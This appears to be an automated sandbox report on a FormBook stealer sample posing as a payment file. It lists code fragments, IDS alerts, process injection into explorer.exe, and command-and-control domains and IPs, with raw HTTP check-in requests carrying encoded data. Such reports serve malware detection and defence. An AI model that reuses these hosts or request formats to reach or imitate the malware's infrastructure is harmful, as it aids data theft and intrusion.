Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then pop edi	9_2_00416CDC
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	11_2_058162F1
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	11_2_0581B7EF
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	11_2_0581966C
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	11_2_09DC9694
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then push dword ptr [ebp-20h]	11_2_09DCA2E8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	11_2_09DCA2E8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then xor edx, edx	11_2_09DCA540
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then push dword ptr [ebp-24h]	11_2_09DCA608
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	11_2_09DCA608
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop esi	13_2_0330732B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	13_2_03306CDC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	13_2_06507CDC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop esi	13_2_0650832B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 192.64.119.254:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49715 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49716 -> 104.18.188.223:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49717 -> 15.197.142.173:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.18.188.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.64.119.254 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.vagabondtracks.com/hd05/

Source: global traffic	HTTP traffic detected: GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=yavfKy4e49Ffd16wiS2AgqQIJavWi70Zom0UgwYqzxTsl8OUGxXc+tZJJXfXWFP/06dpjDbfXA== HTTP/1.1Host: www.stairs.partsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q HTTP/1.1Host: www.tuskerlogix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA== HTTP/1.1Host: www.businessjp6-51399.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?nddt40n=p/NjLOTdg7dIkWP+lnUu3znTw9xENS3rMvTkW+jKr2KjzzB4K5JtXdnsbZtTcOdHBVbqDwqHsQ==&qN9=GZs8E2R84fNPO8q HTTP/1.1Host: www.stmbbill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 15.197.142.173 15.197.142.173
Source: Joe Sandbox View	IP Address: 15.197.142.173 15.197.142.173
Source: Joe Sandbox View	IP Address: 192.64.119.254 192.64.119.254
Source: Joe Sandbox View	IP Address: 192.64.119.254 192.64.119.254
Source: Joe Sandbox View	IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 10_2_111F9F82 getaddrinfo,setsockopt,recv,

10_2_111F9F82

Source: global traffic	HTTP traffic detected: GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=yavfKy4e49Ffd16wiS2AgqQIJavWi70Zom0UgwYqzxTsl8OUGxXc+tZJJXfXWFP/06dpjDbfXA== HTTP/1.1Host: www.stairs.partsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q HTTP/1.1Host: www.tuskerlogix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA== HTTP/1.1Host: www.businessjp6-51399.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?nddt40n=p/NjLOTdg7dIkWP+lnUu3znTw9xENS3rMvTkW+jKr2KjzzB4K5JtXdnsbZtTcOdHBVbqDwqHsQ==&qN9=GZs8E2R84fNPO8q HTTP/1.1Host: www.stmbbill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.stairs.parts
Source: global traffic	DNS traffic detected: DNS query: www.tuskerlogix.com
Source: global traffic	DNS traffic detected: DNS query: www.businessjp6-51399.info
Source: global traffic	DNS traffic detected: DNS query: www.stmbbill.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 08 May 2024 07:41:35 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: order-payment094093.exe, NFOLsr.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: order-payment094093.exe, NFOLsr.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: order-payment094093.exe, NFOLsr.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000A.00000002.3316443586.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.3325270235.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2144713066.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: order-payment094093.exe, 00000000.00000002.2122231428.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, NFOLsr.exe, 0000000B.00000002.2246034694.000000000360F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7727.info
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7727.info/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7727.info/hd05/www.uniqueofferss.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7727.infoReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buddhasiddhartha.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buddhasiddhartha.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buddhasiddhartha.com/hd05/www.sparkfirestarter.net
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buddhasiddhartha.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessjp6-51399.info
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessjp6-51399.info/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessjp6-51399.info/hd05/www.stmbbill.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessjp6-51399.infoReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.damtherncooling.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.damtherncooling.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.damtherncooling.com/hd05/www.teramilab.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.damtherncooling.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.net/hd05/www.symplywell.me
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dropshunter.netReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kathrynmirabella.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kathrynmirabella.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kathrynmirabella.com/hd05/www.vagabondtracks.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kathrynmirabella.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyz/hd05/www.dropshunter.net
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lezxop.xyzReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovepox.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovepox.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovepox.com/hd05/www.kathrynmirabella.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovepox.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.net/hd05/www.damtherncooling.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sparkfirestarter.netReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stairs.parts
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stairs.parts/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stairs.parts/hd05/www.tuskerlogix.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stairs.partsReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stmbbill.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stmbbill.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stmbbill.com/hd05/www.lezxop.xyz
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stmbbill.comReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symplywell.me
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symplywell.me/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symplywell.me/hd05/www.buddhasiddhartha.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symplywell.meReferer:
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teramilab.com
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teramilab.com/hd05/
Source: explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teramilab.com/hd05/www.7727.info
